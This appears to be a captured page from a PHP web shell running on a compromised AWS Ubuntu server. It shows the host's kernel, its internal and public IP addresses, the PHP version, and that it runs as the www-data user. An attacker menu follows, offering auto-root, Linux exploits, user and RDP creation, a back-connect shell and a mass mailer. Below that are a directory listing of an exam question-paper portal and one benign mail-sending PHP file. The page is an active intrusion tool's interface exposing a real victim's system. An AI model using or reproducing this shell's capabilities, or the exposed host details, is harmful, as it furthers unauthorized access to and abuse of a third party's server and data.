Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.12.165.179
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
collportal /
custom_src /
[ HOME SHELL ]
Name
Size
Permission
Action
acceptqp.php
4.45
KB
-rw-rw-r--
addqptrancenter.php
2.13
KB
-rw-rw-r--
assignUserMenu.php
12.78
KB
-rw-rw-r--
assignmod.php
37.61
KB
-rw-rw-r--
availableqp.php
7.95
KB
-rw-rw-r--
changePwd.php
8.62
KB
-rw-rw-r--
deggrpCreation.php
2.84
KB
-rw-rw-r--
degreeCreation.php
4.07
KB
-rw-rw-r--
displayTempDet.php
8.07
KB
-rwxr-xr-x
eligibleQpSetter.php
4.09
KB
-rw-rw-r--
error_log.php
755
B
-rw-rw-r--
forgetPassword.php
4.62
KB
-rw-r--r--
generateBill.php
21.27
KB
-rw-r--r--
getTeacherlists.php
954
B
-rw-rw-r--
guidelines.php
578
B
-rw-rw-r--
login.php
19.3
KB
-rw-rw-r--
mapTeachersQbms.php
3.88
KB
-rw-rw-r--
modupdqp.php
17.15
KB
-rw-rw-r--
prepareQpNew.php
19.1
KB
-rw-rw-r--
preparethqp.php
30.91
KB
-rw-rw-r--
qpbankdet.php
1.47
KB
-rw-rw-r--
qpdaylog.php
433
B
-rw-rw-r--
qpfootnote.php
4.61
KB
-rw-rw-r--
qplog.php
938
B
-rw-rw-r--
qpmodreport.php
6.23
KB
-rw-rw-r--
qpsummary.php
6.9
KB
-rw-rw-r--
qptran.php
24.32
KB
-rw-rw-r--
registration.php
25.41
KB
-rw-rw-r--
saveAbstractForm.php
6.83
KB
-rw-rw-r--
select-final-qp.php
10.17
KB
-rw-rw-r--
selectqpsetter.php
59.35
KB
-rw-rw-r--
sendGridMail.php
1.72
KB
-rw-rw-r--
sendzohomail.php
1.46
KB
-rw-rw-r--
subjectCretion.php
8.58
KB
-rw-rw-r--
subqnwise.php
1.46
KB
-rw-rw-r--
teacherentry.php
10.29
KB
-rw-rw-r--
updqppattern.php
9.83
KB
-rw-rw-r--
uploadPassword.php
805
B
-rw-rw-r--
uploadqp.php
10.22
KB
-rw-rw-r--
usertype.php
5.14
KB
-rw-rw-r--
viewQPScr.php
18.14
KB
-rw-r--r--
wordFile.php
1.32
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sendzohomail.php
<?php function sendZohoMail($emailid, $subject, $message, $apiKey, $supemail){ $curl = curl_init(); $api = base64_decode($apiKey); $emailData = json_encode([ "from" => [ "address" => $supemail ], "to" => [ [ "email_address" => [ "address" => $emailid, // "name" => "Arun Kumar" ] ] ], "subject" => $subject, "htmlbody" => $message ]); curl_setopt_array($curl, array( CURLOPT_URL => "https://api.zeptomail.com/v1.1/email", CURLOPT_RETURNTRANSFER => true, CURLOPT_ENCODING => "", CURLOPT_MAXREDIRS => 10, CURLOPT_TIMEOUT => 30, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POSTFIELDS => $emailData, CURLOPT_HTTPHEADER => array( "accept: application/json", "authorization: $api", "cache-control: no-cache", "content-type: application/json", ), )); $response = curl_exec($curl); $err = curl_error($curl); curl_close($curl); if ($err) { $res = "cURL Error #:" . $err; } else { $res = $response; } return $res; } ?>
Close